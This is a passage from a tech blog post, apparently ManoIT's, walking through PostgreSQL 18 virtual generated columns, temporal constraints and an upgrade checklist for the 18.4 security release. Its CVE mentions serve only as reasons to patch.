6. Virtual Generated Columns — Computed Columns as the New Default

PostgreSQL 12 introduced stored generated columns that materialize values on disk. 18 adds virtual generated columns and makes virtual the default. Virtual columns compute at query time, so they don't take disk space, and changing the expression doesn't trigger a table rewrite.

-- In 18, GENERATED ALWAYS AS ... VIRTUAL is the default
CREATE TABLE invoices (
  id           UUID PRIMARY KEY DEFAULT uuidv7(),
  subtotal     NUMERIC(12,2) NOT NULL,
  tax_rate     NUMERIC(5,4)  NOT NULL DEFAULT 0.10,
  -- STORED must be spelled out; it materializes the value on disk
  total        NUMERIC(12,2) GENERATED ALWAYS AS (subtotal * (1 + tax_rate)) STORED,
  -- No keyword means VIRTUAL in 18 (the VIRTUAL keyword is optional)
  total_v      NUMERIC(12,2) GENERATED ALWAYS AS (subtotal * (1 + tax_rate))
);

-- STORED vs VIRTUAL: only STORED can be indexed today
CREATE INDEX idx_invoices_total ON invoices(total);
-- VIRTUAL: not indexable in 18 (under review for 19)
-- If you need an index, declare STORED explicitly.

7. Temporal Constraints — WITHOUT OVERLAPS and PERIOD

PostgreSQL 18 brings SQL-standard temporal constraints for data that has a time dimension: hotel reservations, employee tenure periods, contract validity windows.

7.1 WITHOUT OVERLAPS — Period Non-Overlap

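-- A key that mixes a scalar column (room_id) with a range needs btree_gist,
-- which supplies the GiST operator class for the integer column
CREATE EXTENSION IF NOT EXISTS btree_gist;

-- Hotel reservation: bookings for the same room must not overlap in time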
CREATE TABLE reservations (
  room_id    INT,
  period     daterange NOT NULL,
  guest_name TEXT,
  -- 18 new: WITHOUT OVERLAPS on the period column
  PRIMARY KEY (room_id, period WITHOUT OVERLAPS)
);

-- Overlapping attempt — previously required a custom trigger
INSERT INTO reservations VALUES (101, daterange('2026-06-01','2026-06-05'), 'Alice');
INSERT INTO reservations VALUES (101, daterange('2026-06-03','2026-06-07'), 'Bob');
-- ERROR: conflicting key value violates exclusion constraint "reservations_pkey"
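
The two-argument daterange constructor builds a half-open range: the lower bound is included and the upper bound is excluded. A minimal Python sketch of the overlap test the constraint enforces per room, with ranges modeled as `(lower, upper)` tuples. `overlaps` is a hypothetical helper, and the `carol` booking is added for illustration:

```python
from datetime import date


def overlaps(a: tuple[date, date], b: tuple[date, date]) -> bool:
    """True if two half-open [lower, upper) date ranges share any day."""
    return a[0] < b[1] and b[0] < a[1]


alice = (date(2026, 6, 1), date(2026, 6, 5))
bob = (date(2026, 6, 3), date(2026, 6, 7))
carol = (date(2026, 6, 5), date(2026, 6, 9))
```

Alice and Bob conflict, as in the INSERT above. Alice and Carol do not, because Alice's range ends where Carol's begins, which is the behavior you want for a checkout day that doubles as the next check-in day.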

7.2 PERIOD — Temporal Foreign Key

-- Employee tenure: each employee's dept_id must reference department rows
-- whose combined periods fully cover the employee period.
CREATE TABLE departments (
  dept_id   INT,
  period    daterange NOT NULL,
  dept_name TEXT,
  PRIMARY KEY (dept_id, period WITHOUT OVERLAPS)
);

CREATE TABLE employee_history (
  emp_id    INT,
  period    daterange NOT NULL,
  dept_id   INT NOT NULL,
  PRIMARY KEY (emp_id, period WITHOUT OVERLAPS),
  -- 18 new: temporal foreign key using PERIOD
  FOREIGN KEY (dept_id, PERIOD period) REFERENCES departments (dept_id, PERIOD period)
);

-- ⚠️ note: temporal FKs do not yet support RESTRICT / CASCADE /
-- SET NULL / SET DEFAULT on ON DELETE or ON UPDATE — only NO ACTION

Implementation detail: temporal constraints use GiST indexes internally, so they're larger than B-Tree indexes. And because ON DELETE/UPDATE actions are limited, treat temporal FK enforcement as "partially restricted relative to the SQL standard" when adopting them.
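
A temporal foreign key is satisfied when the referenced rows with the same key, taken together, cover the referencing row's whole period. A single referenced row does not have to span it alone. A minimal Python sketch of that coverage check over half-open `(lower, upper)` periods. `is_covered` is a hypothetical helper, not PostgreSQL's internal algorithm:

```python
from datetime import date

Period = tuple[date, date]  # half-open [lower, upper)


def is_covered(child: Period, parents: list[Period]) -> bool:
    """True if the union of parent periods covers the whole child period."""
    covered_until = child[0]
    for lower, upper in sorted(parents):
        if lower > covered_until:
            break  # gap before the next parent period starts
        covered_until = max(covered_until, upper)
        if covered_until >= child[1]:
            return True
    return False
```

For example, an employee period from 2024-06-01 to 2026-06-01 is covered by two adjacent department rows spanning 2024 and 2025 through 2026, but not if there is a two-month gap between those rows.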

8. ManoIT Internal Cluster Verification Checklist

The 12-step sequence ManoIT applied to internal RDS PostgreSQL 18 (18.1 → 18.4) plus on-prem 18 clusters, alongside the io_method transition and OAuth rollout:

Step	Target	Verification Command / Action	Expected Outcome
1	refint triggers	Run the SQL from §2.1	0 rows expected; if any, migrate immediately
2	MD5 users	Run the SQL from §2.2	All should be scram-sha-256
3	SSL/GSS exposure	Review `hostssl` / `hostgssenc` CIDRs in `pg_hba.conf`	No internet-wide (0.0.0.0/0) rules
4	Logical replication owner	`SELECT subname, subowner::regrole FROM pg_subscription;`	Confirm subscriber owners are known roles
5	Apply 18.4 patch	RDS: in-place minor upgrade to 18.4 during maintenance window; on-prem: `apt install postgresql-18=18.4-1`	Confirm version 18.4, all extensions compatible
6	`io_method` transition	Keep `worker` or switch to `io_uring` (kernel 5.1+)	Increased dispatch counts in `pg_stat_io`
7	OAuth pg_hba.conf	Apply §4.1–4.3 and `pg_reload_conf()`	Keep scram-sha-256 line for emergency access
8	Adopt uuidv7()	Change new tables' PK to `DEFAULT uuidv7()`; existing tables go dual-column	Watch index cache hit rate
9	Virtual Generated Columns	Only keep STORED where indexes are required	Confirm table size decrease
10	Temporal Constraints PoC	Adopt `WITHOUT OVERLAPS` in reservation/contract domains	Unit-test rejecting overlapping INSERTs
11	Standby replication	Patch streaming replicas to 18.4, monitor lag	Lag returns to <1s
12	Rollback plan	18.4 → 18.3 downgrade is unsupported → verify base-backup restore plan	Confirm 30-day PITR window

9. Closing — The New Defaults 18.4 Sets

PostgreSQL 18.4 is a release where "major security patches and the future authentication / identification / temporal model both arrive in stable form". Among the 11 CVEs, the refint RCE (CVE-2026-6637), the SSL/GSS DoS (CVE-2026-6479), and the logical-replication SQL injection (CVE-2026-6476) demand patching now. The major-18 features — io_method=worker (default) → io_uring (Linux 5.1+), native OAuth 2.0, uuidv7(), Virtual Generated Columns, Temporal Constraints — are now the starting point for 2026 H2 new schemas.

ManoIT's recommended operational sequence: (1) apply the security patches across every supported track (14.23, 15.18, 16.14, 17.10, 18.4) within seven days; (2) audit and remove the three risk patterns — refint, MD5 authentication, unrestricted SSL/GSS exposure; (3) keep io_method=worker as a baseline and switch to io_uring on Linux 5.1+ workloads; (4) design new services starting with OAuth 2.0 authentication + uuidv7() + Virtual Generated Columns; (5) introduce WITHOUT OVERLAPS and PERIOD for reservation, contract, and history tables where the time dimension matters. The database is no longer "an engine that runs SQL" — it's now an enterprise security control point that standardizes authentication, identification, the time dimension, and the I/O model together.

This post was co-authored by Anthropic Claude (Opus 4.6) and the ManoIT engineering team. PostgreSQL 18.4 release notes and security advisories from postgresql.org are primary sources. ManoIT internal verification results are provided as reference and should not be generalized. Please credit the source when citing or republishing.

Originally published at ManoIT Tech Blog.
